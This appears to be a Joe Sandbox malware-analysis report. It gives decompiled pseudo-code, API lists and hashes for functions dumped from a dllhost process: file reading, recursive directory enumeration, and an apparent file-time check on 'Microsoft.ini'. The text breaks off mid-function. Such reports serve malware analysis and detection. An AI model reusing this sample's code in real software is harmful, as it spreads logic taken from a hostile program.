                                                Function 0286E550 Relevance: 1.4, APIs: 1, Instructions: 199COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E0286E550(char* __ecx) {
				intOrPtr _v8;
				char _v96;
				char _v100;
				intOrPtr _v104;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				void _v132;
				long _v136;
				void* _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				long _t58;
				void* _t59;
				char _t61;
				char _t62;
				char _t63;
				void* _t67;
				void* _t68;
				char _t70;
				intOrPtr _t76;
				signed int _t87;
				signed int _t89;
				intOrPtr _t90;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t101;
				char _t112;
				intOrPtr _t136;
				void _t146;
				void* _t157;
				void* _t158;
				intOrPtr _t160;

				_push(_t87);
				_t146 = __ecx;
				_t170 = __ecx;
				if(__ecx == 0) {
					L31:
					__eflags = 0;
					return 0;
				} else {
					_t58 = E0286E3C0(__ecx, _t170); // executed
					_t89 = _t87 | 0xffffffff;
					_v136 = _t58;
					_t155 =  ==  ? _t89 : 0; // executed
					_t59 = E0286E170(__ecx, _t58, 0); // executed
					_t156 =  !=  ? _t89 :  ==  ? _t89 : 0; // executed
					E0286E320(__ecx,  &_v140, _t59); // executed
					_t157 =  !=  ? _t89 :  !=  ? _t89 :  ==  ? _t89 : 0;
					_t61 = E0286E280(__ecx,  &_v152);
					_v144 = _v152;
					if(_t61 != 0) {
						L4:
						__eflags = _t61;
						_v144 = 0;
						_t157 =  !=  ? _t89 : _t157;
					} else {
						_t61 = E0286E280(__ecx,  &_v152);
						if(_t61 != 0) {
							goto L4;
						} else {
							_t101 = _v152 << 8;
							_v144 = _v144 + _t101;
							_t89 = _t101 | 0xffffffff;
						}
					}
					_t62 = E0286E280(_t146,  &_v152);
					_v148 = _v152;
					if(_t62 != 0) {
						L8:
						__eflags = _t62;
						_v148 = 0;
						_t157 =  !=  ? _t89 : _t157;
					} else {
						_t62 = E0286E280(_t146,  &_v152);
						if(_t62 != 0) {
							goto L8;
						} else {
							_v148 = _v148 + (_v152 << 8);
						}
					}
					_t63 = E0286E280(_t146,  &_v152);
					_v140 = _v152;
					if(_t63 != 0) {
						L12:
						_t90 = 0;
						__eflags = _t63;
						_t157 =  !=  ? 0xffffffff : _t157;
					} else {
						_t63 = E0286E280(_t146,  &_v152);
						if(_t63 != 0) {
							goto L12;
						} else {
							_t90 = (_v152 << 8) + _v140;
						}
					}
					_v128 = _t90;
					_t112 = E0286E280(_t146,  &_v152);
					_v140 = _v152;
					if(_t112 != 0) {
						L16:
						_t67 = 0;
						__eflags = _t112;
						_t158 =  !=  ? 0xffffffff : _t157;
					} else {
						_t112 = E0286E280(_t146,  &_v152);
						if(_t112 != 0) {
							goto L16;
						} else {
							_t67 = (_v152 << 8) + _v140;
						}
					}
					if(_t67 != _t90 || _v148 != 0) {
						L20:
						_t158 = 0xffffff99;
					} else {
						_t184 = _v144;
						if(_v144 != 0) {
							goto L20;
						}
					}
					_t68 = E0286E320(_t146,  &_v100, _t184);
					_t159 =  !=  ? 0xffffffff : _t158;
					E0286E320(_t146,  &_v96, _t68);
					_t160 =  !=  ? 0xffffffff :  !=  ? 0xffffffff : _t158;
					_t70 = E0286E280(_t146,  &_v152);
					_t92 = _v152;
					if(_t70 != 0) {
						L24:
						__eflags = _t70;
						_v124 = 0;
						_t160 =  !=  ? 0xffffffff : _t160;
					} else {
						_t70 = E0286E280(_t146,  &_v152);
						if(_t70 != 0) {
							goto L24;
						} else {
							_v124 = (_v152 << 8) + _t92;
						}
					}
					_t136 =  *((intOrPtr*)(_t146 + 0xc));
					_t118 = _v136 + _t136;
					_t93 = _v100;
					if(_v136 + _t136 < _v96 + _t93 || _t160 != 0) {
						__eflags =  *((char*)(_t146 + 0x10));
						if( *((char*)(_t146 + 0x10)) != 0) {
							CloseHandle( *(_t146 + 4));
						}
						_push(0x20);
						E02870AA1(_t146);
						goto L31;
					} else {
						_t76 = _v136;
						_v132 = _t146;
						_push(0x80);
						_v120 = _t136 - _t93 - _v96 + _t76;
						_v104 = _t76;
						_v8 = _t160;
						 *((intOrPtr*)(_t146 + 0xc)) = _t160;
						_t94 = E02875A3B(_t118);
						memcpy(_t94,  &_v132, 0x20 << 2);
						E0286EC60(_t94);
						return _t94;
					}
				}
			}






































                                                0x0286e55c
                                                0x0286e55f
                                                0x0286e561
                                                0x0286e563
                                                0x0286e7aa
                                                0x0286e7ac
                                                0x0286e7b2
                                                0x0286e569
                                                0x0286e56b
                                                0x0286e570
                                                0x0286e573
                                                0x0286e57f
                                                0x0286e582
                                                0x0286e592
                                                0x0286e595
                                                0x0286e5a2
                                                0x0286e5a5
                                                0x0286e5ae
                                                0x0286e5b4
                                                0x0286e5d5
                                                0x0286e5d5
                                                0x0286e5d7
                                                0x0286e5df
                                                0x0286e5b6
                                                0x0286e5bc
                                                0x0286e5c3
                                                0x00000000
                                                0x0286e5c5
                                                0x0286e5c9
                                                0x0286e5cc
                                                0x0286e5d0
                                                0x0286e5d0
                                                0x0286e5c3
                                                0x0286e5e8
                                                0x0286e5f1
                                                0x0286e5f7
                                                0x0286e615
                                                0x0286e615
                                                0x0286e617
                                                0x0286e61f
                                                0x0286e5f9
                                                0x0286e5ff
                                                0x0286e606
                                                0x00000000
                                                0x0286e608
                                                0x0286e60f
                                                0x0286e60f
                                                0x0286e606
                                                0x0286e628
                                                0x0286e631
                                                0x0286e637
                                                0x0286e655
                                                0x0286e655
                                                0x0286e657
                                                0x0286e65e
                                                0x0286e639
                                                0x0286e63f
                                                0x0286e646
                                                0x00000000
                                                0x0286e648
                                                0x0286e64f
                                                0x0286e64f
                                                0x0286e646
                                                0x0286e665
                                                0x0286e670
                                                0x0286e676
                                                0x0286e67c
                                                0x0286e69c
                                                0x0286e69c
                                                0x0286e69e
                                                0x0286e6a5
                                                0x0286e67e
                                                0x0286e689
                                                0x0286e68d
                                                0x00000000
                                                0x0286e68f
                                                0x0286e696
                                                0x0286e696
                                                0x0286e68d
                                                0x0286e6aa
                                                0x0286e6ba
                                                0x0286e6ba
                                                0x0286e6b3
                                                0x0286e6b3
                                                0x0286e6b8
                                                0x00000000
                                                0x00000000
                                                0x0286e6b8
                                                0x0286e6c5
                                                0x0286e6d7
                                                0x0286e6da
                                                0x0286e6e7
                                                0x0286e6ea
                                                0x0286e6ef
                                                0x0286e6f5
                                                0x0286e715
                                                0x0286e715
                                                0x0286e717
                                                0x0286e724
                                                0x0286e6f7
                                                0x0286e6fd
                                                0x0286e704
                                                0x00000000
                                                0x0286e706
                                                0x0286e70f
                                                0x0286e70f
                                                0x0286e704
                                                0x0286e72f
                                                0x0286e732
                                                0x0286e734
                                                0x0286e73c
                                                0x0286e790
                                                0x0286e794
                                                0x0286e799
                                                0x0286e799
                                                0x0286e79f
                                                0x0286e7a2
                                                0x00000000
                                                0x0286e742
                                                0x0286e742
                                                0x0286e74e
                                                0x0286e752
                                                0x0286e757
                                                0x0286e75b
                                                0x0286e75f
                                                0x0286e766
                                                0x0286e76e
                                                0x0286e77e
                                                0x0286e782
                                                0x0286e78f
                                                0x0286e78f
                                                0x0286e73c

                                                APIs
                                                  • Part of subcall function 0286E170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0286E3D2,00000002,00000001,?,?,?,0286E570,?,00000000,00000001), ref: 0286E190
                                                  • Part of subcall function 0286E280: ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,0286E59A,00000001), ref: 0286E2A8
                                                • CloseHandle.KERNEL32(?), ref: 0286E799
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$CloseHandlePointerRead
                                                • String ID:
                                                • API String ID: 3130900363-0
                                                • Opcode ID: 3fbbb45b6869d495bbd26ab7ccfb1ab606f5e3009d34d4735eb5686a2f9ff319
                                                • Instruction ID: 80732293805e388e207109b9dcf6eef1a24b5a36ff114786d4fc493485ed608f
                                                • Opcode Fuzzy Hash: 3fbbb45b6869d495bbd26ab7ccfb1ab606f5e3009d34d4735eb5686a2f9ff319
                                                • Instruction Fuzzy Hash: 61612B7D7043019FD715DE288894A3FB3E2AFC4364F048A2DE969C7281EB70D9098A82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0286AA40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 143fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E0286AA40(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi) {
				signed int _v12;
				short _v536;
				char _v1056;
				struct _WIN32_FIND_DATAW _v1648;
				signed int _v1649;
				intOrPtr _v1656;
				void* __esi;
				signed int _t32;
				signed int _t36;
				signed int _t37;
				WCHAR* _t38;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				signed int _t50;
				signed int _t51;
				WCHAR* _t55;
				void* _t62;
				intOrPtr* _t64;
				char* _t67;
				char* _t70;
				void* _t74;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				intOrPtr* _t80;
				void* _t81;
				signed int _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;

				_t32 =  *0x288f008; // 0xe7fe870c
				_v12 = _t32 ^ _t82;
				_v1656 = __edx;
				_t80 = __ecx;
				E02873440(__ecx,  &_v536, 0, 0x208);
				_t64 = _t80;
				_t84 = _t83 + 0xc;
				_t74 = _t64 + 2;
				do {
					_t36 =  *_t64;
					_t64 = _t64 + 2;
				} while (_t36 != 0);
				_t81 = wsprintfW;
				_push(_t80);
				_t37 = _t36 & 0xffffff00 |  *((short*)(_t80 + (_t64 - _t74 >> 1) * 2 - 2)) == 0x0000005c;
				_v1649 = _t37;
				_t38 =  &_v536;
				if(_t37 == 0) {
					_push(L"%ws\\*");
				} else {
					_push(L"%ws*");
				}
				wsprintfW(_t38, ??);
				_t85 = _t84 + 0xc;
				_t62 = FindFirstFileW( &_v536,  &_v1648);
				if(_t62 != 0xffffffff) {
					do {
						_t67 = ".";
						_t43 =  &(_v1648.cFileName);
						while(1) {
							_t75 =  *_t43;
							__eflags = _t75 -  *_t67;
							if(_t75 !=  *_t67) {
								break;
							}
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
								_t44 = 0;
							} else {
								_t78 =  *((intOrPtr*)(_t43 + 2));
								_t17 =  &(_t67[2]); // 0x2e0000
								__eflags = _t78 -  *_t17;
								if(_t78 !=  *_t17) {
									break;
								} else {
									_t43 = _t43 + 4;
									_t67 =  &(_t67[4]);
									__eflags = _t78;
									if(_t78 != 0) {
										continue;
									} else {
										goto L12;
									}
								}
							}
							L14:
							__eflags = _t44;
							if(_t44 != 0) {
								_t70 = L"..";
								_t50 =  &(_v1648.cFileName);
								while(1) {
									_t76 =  *_t50;
									__eflags = _t76 -  *_t70;
									if(_t76 !=  *_t70) {
										break;
									}
									__eflags = _t76;
									if(_t76 == 0) {
										L20:
										_t51 = 0;
									} else {
										_t77 =  *((intOrPtr*)(_t50 + 2));
										_t20 =  &(_t70[2]); // 0x2e
										__eflags = _t77 -  *_t20;
										if(_t77 !=  *_t20) {
											break;
										} else {
											_t50 = _t50 + 4;
											_t70 =  &(_t70[4]);
											__eflags = _t77;
											if(_t77 != 0) {
												continue;
											} else {
												goto L20;
											}
										}
									}
									L22:
									__eflags = _t51;
									if(_t51 != 0) {
										__eflags = _v1648.dwFileAttributes & 0x00000010;
										if((_v1648.dwFileAttributes & 0x00000010) != 0) {
											E02873440(_t80,  &_v1056, 0, 0x208);
											_t86 = _t85 + 0xc;
											__eflags = _v1649;
											_push( &(_v1648.cFileName));
											_push(_t80);
											_t55 =  &_v1056;
											if(__eflags == 0) {
												_push(L"%ws\\%ws");
											} else {
												_push(L"%ws%ws");
											}
											wsprintfW(_t55, ??);
											E0286A970(_t62, _t80, __eflags, _v1656,  &_v1056);
											_t85 = _t86 + 0x18;
										}
									}
									goto L28;
								}
								asm("sbb eax, eax");
								_t51 = _t50 | 0x00000001;
								__eflags = _t51;
								goto L22;
							}
							goto L28;
						}
						asm("sbb eax, eax");
						_t44 = _t43 | 0x00000001;
						__eflags = _t44;
						goto L14;
						L28:
						_t46 = FindNextFileW(_t62,  &_v1648);
						__eflags = _t46;
					} while (_t46 != 0);
					FindClose(_t62);
					__eflags = _v12 ^ _t82;
					return E02870A5D(_v12 ^ _t82, _t81);
				} else {
					return E02870A5D(_v12 ^ _t82, _t81);
				}
			}




































                                                0x0286aa49
                                                0x0286aa50
                                                0x0286aa61
                                                0x0286aa6a
                                                0x0286aa6c
                                                0x0286aa71
                                                0x0286aa73
                                                0x0286aa76
                                                0x0286aa80
                                                0x0286aa80
                                                0x0286aa83
                                                0x0286aa86
                                                0x0286aa8b
                                                0x0286aa95
                                                0x0286aa9c
                                                0x0286aa9f
                                                0x0286aaa7
                                                0x0286aaad
                                                0x0286aab6
                                                0x0286aaaf
                                                0x0286aaaf
                                                0x0286aaaf
                                                0x0286aabc
                                                0x0286aabe
                                                0x0286aad5
                                                0x0286aada
                                                0x0286aaf0
                                                0x0286aaf0
                                                0x0286aaf5
                                                0x0286ab00
                                                0x0286ab00
                                                0x0286ab03
                                                0x0286ab06
                                                0x00000000
                                                0x00000000
                                                0x0286ab08
                                                0x0286ab0b
                                                0x0286ab22
                                                0x0286ab22
                                                0x0286ab0d
                                                0x0286ab0d
                                                0x0286ab11
                                                0x0286ab11
                                                0x0286ab15
                                                0x00000000
                                                0x0286ab17
                                                0x0286ab17
                                                0x0286ab1a
                                                0x0286ab1d
                                                0x0286ab20
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286ab20
                                                0x0286ab15
                                                0x0286ab2b
                                                0x0286ab2b
                                                0x0286ab2d
                                                0x0286ab33
                                                0x0286ab38
                                                0x0286ab40
                                                0x0286ab40
                                                0x0286ab43
                                                0x0286ab46
                                                0x00000000
                                                0x00000000
                                                0x0286ab48
                                                0x0286ab4b
                                                0x0286ab62
                                                0x0286ab62
                                                0x0286ab4d
                                                0x0286ab4d
                                                0x0286ab51
                                                0x0286ab51
                                                0x0286ab55
                                                0x00000000
                                                0x0286ab57
                                                0x0286ab57
                                                0x0286ab5a
                                                0x0286ab5d
                                                0x0286ab60
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286ab60
                                                0x0286ab55
                                                0x0286ab6b
                                                0x0286ab6b
                                                0x0286ab6d
                                                0x0286ab6f
                                                0x0286ab76
                                                0x0286ab86
                                                0x0286ab8b
                                                0x0286ab94
                                                0x0286ab9b
                                                0x0286ab9c
                                                0x0286ab9d
                                                0x0286aba3
                                                0x0286abac
                                                0x0286aba5
                                                0x0286aba5
                                                0x0286aba5
                                                0x0286abb2
                                                0x0286abc4
                                                0x0286abc9
                                                0x0286abc9
                                                0x0286ab76
                                                0x00000000
                                                0x0286ab6d
                                                0x0286ab66
                                                0x0286ab68
                                                0x0286ab68
                                                0x00000000
                                                0x0286ab68
                                                0x00000000
                                                0x0286ab2d
                                                0x0286ab26
                                                0x0286ab28
                                                0x0286ab28
                                                0x00000000
                                                0x0286abcc
                                                0x0286abd4
                                                0x0286abda
                                                0x0286abda
                                                0x0286abe3
                                                0x0286abf0
                                                0x0286abfb
                                                0x0286aadc
                                                0x0286aaee
                                                0x0286aaee

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: FileFindFirstwsprintf
                                                • String ID: %ws%ws$%ws*$%ws\%ws$%ws\*
                                                • API String ID: 2655791690-2373285283
                                                • Opcode ID: 04f19c473a5fb18544ff9bcc8c51d0c488a3aedda128d2563bc462c7d3890c4d
                                                • Instruction ID: 9c8aeac1137c5809eb13c4f436d8b0d645e2290d83f70035d41d24f9eadb835c
                                                • Opcode Fuzzy Hash: 04f19c473a5fb18544ff9bcc8c51d0c488a3aedda128d2563bc462c7d3890c4d
                                                • Instruction Fuzzy Hash: 38415C7D9002099ADB28EF24DC49FF6737BEF51208F4444E6D90EE7141E7339654CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286A3B0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 190filetimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0286A3B0(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
				signed int _v8;
				short _v532;
				short _v1052;
				struct _FILETIME _v1060;
				struct _FILETIME _v1068;
				struct _FILETIME _v1076;
				struct _FILETIME _v1084;
				struct _FILETIME _v1092;
				struct _FILETIME _v1100;
				void* __esi;
				signed int _t38;
				void* _t50;
				int _t61;
				void* _t69;
				void* _t72;
				signed int _t83;
				signed int _t94;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				signed int _t103;

				_t95 = __edi;
				_t94 = __edx;
				_t38 =  *0x288f008; // 0xe7fe870c
				_v8 = _t38 ^ _t103;
				_t99 = __ecx;
				E02873440(__edi,  &_v532, 0, 0x208);
				_t100 = wsprintfW;
				wsprintfW( &_v532, L"%ws\\%ws", _t99, L"Microsoft.ini");
				E02873440(_t95,  &_v1052, 0, 0x208);
				wsprintfW( &_v1052, L"%ws.log",  &_v532);
				_t50 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0, 0);
				if(_t50 == 0xffffffff) {
					L14:
					__eflags = _v8 ^ _t103;
					return E02870A5D(_v8 ^ _t103, _t100);
				} else {
					_t101 = CloseHandle;
					CloseHandle(_t50);
					_v1092.dwLowDateTime = 0;
					_v1092.dwHighDateTime = 0;
					_v1100.dwLowDateTime = 0;
					_v1100.dwHighDateTime = 0;
					_v1060.dwLowDateTime = 0;
					_v1060.dwHighDateTime = 0;
					_v1068.dwLowDateTime = 0;
					_v1068.dwHighDateTime = 0;
					_v1076.dwLowDateTime = 0;
					_v1076.dwHighDateTime = 0;
					_v1084.dwLowDateTime = 0;
					_v1084.dwHighDateTime = 0;
					_t96 = CreateFileW( &_v1052, 0x80000000, 1, 0, 2, 0x80, 0);
					if(_t96 == 0xffffffff) {
						L13:
						__eflags = _v8 ^ _t103;
						return E02870A5D(_v8 ^ _t103, _t101);
					} else {
						_t61 = GetFileTime(_t96,  &_v1092,  &_v1060,  &_v1076);
						_push(_t96);
						if(_t61 != 0) {
							CloseHandle();
							DeleteFileW( &_v1052);
							_t97 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0x80, 0);
							__eflags = _t97 - 0xffffffff;
							if(_t97 != 0xffffffff) {
								GetFileTime(_t97,  &_v1100,  &_v1068,  &_v1084);
								CloseHandle(_t97);
							}
							asm("sbb eax, [ebp-0x424]");
							_t98 = E02884470(_v1060.dwLowDateTime - _v1068.dwLowDateTime, _v1060.dwHighDateTime, 0x2710, 0);
							_t101 = _v1076.dwLowDateTime - _v1084.dwLowDateTime;
							_t83 = _t94;
							asm("sbb ecx, [ebp-0x434]");
							_t69 = E02884470(_v1076.dwLowDateTime - _v1084.dwLowDateTime, _v1076.dwHighDateTime, 0x2710, 0);
							__eflags = _t83 - _t94;
							if(__eflags < 0) {
								L9:
								_t69 = _t98;
								_t94 = _t83;
							} else {
								if(__eflags <= 0) {
									__eflags = _t98 - _t69;
									if(_t98 <= _t69) {
										goto L9;
									}
								}
							}
							_t72 = E02884470(E02884470(E02884470(_t69, _t94, 0x3e8, 0), _t94, 0x3c, 0), _t94, 0x3c, 0);
							__eflags = _t94;
							if(__eflags < 0) {
								goto L13;
							} else {
								if(__eflags > 0) {
									goto L14;
								} else {
									__eflags = _t72 - 0x48;
									if(_t72 > 0x48) {
										goto L14;
									} else {
										goto L13;
									}
								}
							}
						} else {
							CloseHandle();
							return E02870A5D(_v8 ^ _t103, CloseHandle);
						}
					}
				}
			}


























                                                0x0286a3b0
                                                0x0286a3b0
                                                0x0286a3b9
                                                0x0286a3c0
                                                0x0286a3d1
                                                0x0286a3d6
                                                0x0286a3ea
                                                0x0286a3f6
                                                0x0286a406
                                                0x0286a421
                                                0x0286a442
                                                0x0286a447
                                                0x0286a61a
                                                0x0286a621
                                                0x0286a62c
                                                0x0286a44d
                                                0x0286a44d
                                                0x0286a454
                                                0x0286a46e
                                                0x0286a479
                                                0x0286a483
                                                0x0286a48d
                                                0x0286a497
                                                0x0286a4a1
                                                0x0286a4ab
                                                0x0286a4b5
                                                0x0286a4bf
                                                0x0286a4c9
                                                0x0286a4d3
                                                0x0286a4dd
                                                0x0286a4e9
                                                0x0286a4ee
                                                0x0286a607
                                                0x0286a60f
                                                0x0286a619
                                                0x0286a4f4
                                                0x0286a50a
                                                0x0286a510
                                                0x0286a513
                                                0x0286a52a
                                                0x0286a533
                                                0x0286a554
                                                0x0286a556
                                                0x0286a559
                                                0x0286a571
                                                0x0286a578
                                                0x0286a578
                                                0x0286a58c
                                                0x0286a5a6
                                                0x0286a5a8
                                                0x0286a5ae
                                                0x0286a5b6
                                                0x0286a5c5
                                                0x0286a5ca
                                                0x0286a5cc
                                                0x0286a5d4
                                                0x0286a5d4
                                                0x0286a5d6
                                                0x0286a5ce
                                                0x0286a5ce
                                                0x0286a5d0
                                                0x0286a5d2
                                                0x00000000
                                                0x00000000
                                                0x0286a5d2
                                                0x0286a5ce
                                                0x0286a5f7
                                                0x0286a5fc
                                                0x0286a5fe
                                                0x00000000
                                                0x0286a600
                                                0x0286a600
                                                0x00000000
                                                0x0286a602
                                                0x0286a602
                                                0x0286a605
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286a605
                                                0x0286a600
                                                0x0286a515
                                                0x0286a515
                                                0x0286a529
                                                0x0286a529
                                                0x0286a513
                                                0x0286a4ee

                                                APIs
                                                • wsprintfW.USER32 ref: 0286A3F6
                                                • wsprintfW.USER32 ref: 0286A421
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0286A442
                                                • CloseHandle.KERNEL32(00000000), ref: 0286A454
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000002,00000080,00000000), ref: 0286A4E7
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0286A50A
                                                • CloseHandle.KERNEL32(00000000), ref: 0286A515
                                                • CloseHandle.KERNEL32(00000000), ref: 0286A52A
                                                • DeleteFileW.KERNEL32(?), ref: 0286A533
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0286A552
                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0286A571
                                                • CloseHandle.KERNEL32(00000000), ref: 0286A578
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A59B
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A5C5
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A5E1
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A5EC
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0286A5F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$Unothrow_t@std@@@__ehfuncinfo$??2@$CloseHandle$Create$Timewsprintf$Delete
                                                • String ID: %ws.log$%ws\%ws$Microsoft.ini
                                                • API String ID: 3158408392-397874326
                                                • Opcode ID: 59cd4b67f92ef2b8029d518b0d61b39abce83cb0e95b2d8c4f712ae795199e07
                                                • Instruction ID: dc51cbf324e6487e084b8496f617a3942fe489cc0c0e40e6abc568a036b17000
                                                • Opcode Fuzzy Hash: 59cd4b67f92ef2b8029d518b0d61b39abce83cb0e95b2d8c4f712ae795199e07
                                                • Instruction Fuzzy Hash: DF51A7B9A4021C6AEB20DA68CC89FEE777DAB44714F5001D9F708F71C1DBB45A848F59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0287221C Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 270COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E0287221C(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				char _v5;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v72;
				intOrPtr* _v80;
				signed int _v100;
				signed int* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t190;
				signed int* _t198;
				intOrPtr* _t199;
				signed int _t202;
				signed int _t206;
				intOrPtr* _t210;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t221;
				void* _t225;
				signed int _t227;
				void* _t231;
				void* _t233;
				char _t234;
				signed int* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				signed int _t244;
				void* _t246;
				void* _t248;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t254;
				void* _t256;
				char _t257;
				signed int _t263;
				char* _t267;
				intOrPtr _t273;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				char _t283;
				intOrPtr _t285;
				signed int _t287;
				signed int* _t289;
				intOrPtr* _t290;
				signed int* _t292;
				signed int _t294;
				intOrPtr _t300;
				intOrPtr* _t304;
				signed int _t305;
				void* _t306;
				signed int* _t310;
				void* _t313;
				void* _t314;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;

				_t282 = __edx;
				_t264 = __ecx;
				_t253 = _a8;
				_push(_t304);
				_t289 = _a20;
				_v44 = 0;
				_v5 = 0;
				if(_t289[1] > 0x80) {
					_t190 =  *((intOrPtr*)(_t253 + 8));
				} else {
					_t190 =  *((char*)(_t253 + 8));
				}
				_v12 = _t190;
				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
					L62:
					E0287753C(_t253, _t264, _t289, _t304, __eflags);
					goto L63;
				} else {
					_t304 = _a4;
					if( *_t304 != 0xe06d7363) {
						_t264 = _a12;
						goto L57;
					} else {
						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
							L23:
							_t264 = _a12;
							_v16 = _t264;
							goto L25;
						} else {
							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
								goto L23;
							} else {
								_t225 = E0287360E(_t253, _t264, _t282, _t289, _t304, _t328);
								_t329 =  *((intOrPtr*)(_t225 + 0x10));
								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
									L61:
									return _t225;
								} else {
									_t304 =  *((intOrPtr*)(E0287360E(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
									_t246 = E0287360E(_t253, _t264, _t282, _t289, _t304, _t329);
									_v44 = 1;
									_v16 =  *((intOrPtr*)(_t246 + 0x14));
									if(_t304 == 0) {
										goto L62;
									} else {
										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
											L19:
											_t248 = E0287360E(_t253, _t264, _t282, _t289, _t304, _t336);
											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
												L24:
												_t264 = _v16;
												_t190 = _v12;
												L25:
												__eflags =  *_t304 - 0xe06d7363;
												if( *_t304 != 0xe06d7363) {
													L57:
													__eflags = _t289[3];
													if(__eflags <= 0) {
														goto L60;
													} else {
														__eflags = _a24;
														if(__eflags != 0) {
															goto L62;
														} else {
															_push(_a32);
															_push(_a28);
															_push(_t190);
															_push(_t289);
															_push(_a16);
															_push(_t264);
															_push(_t253);
															_push(_t304);
															L66();
															_t316 = _t316 + 0x20;
															goto L60;
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
														goto L57;
													} else {
														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
															L30:
															__eflags = _t289[3];
															if(_t289[3] > 0) {
																_t264 =  &_v28;
																_t233 = E02873879( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
																_t282 = _v28;
																_t316 = _t316 + 0x14;
																__eflags = _t282 - _v48;
																if(_t282 < _v48) {
																	_t47 = _t233 + 0x10; // 0x10
																	_t278 = _t47;
																	_t234 = _v12;
																	_v36 = _t278;
																	do {
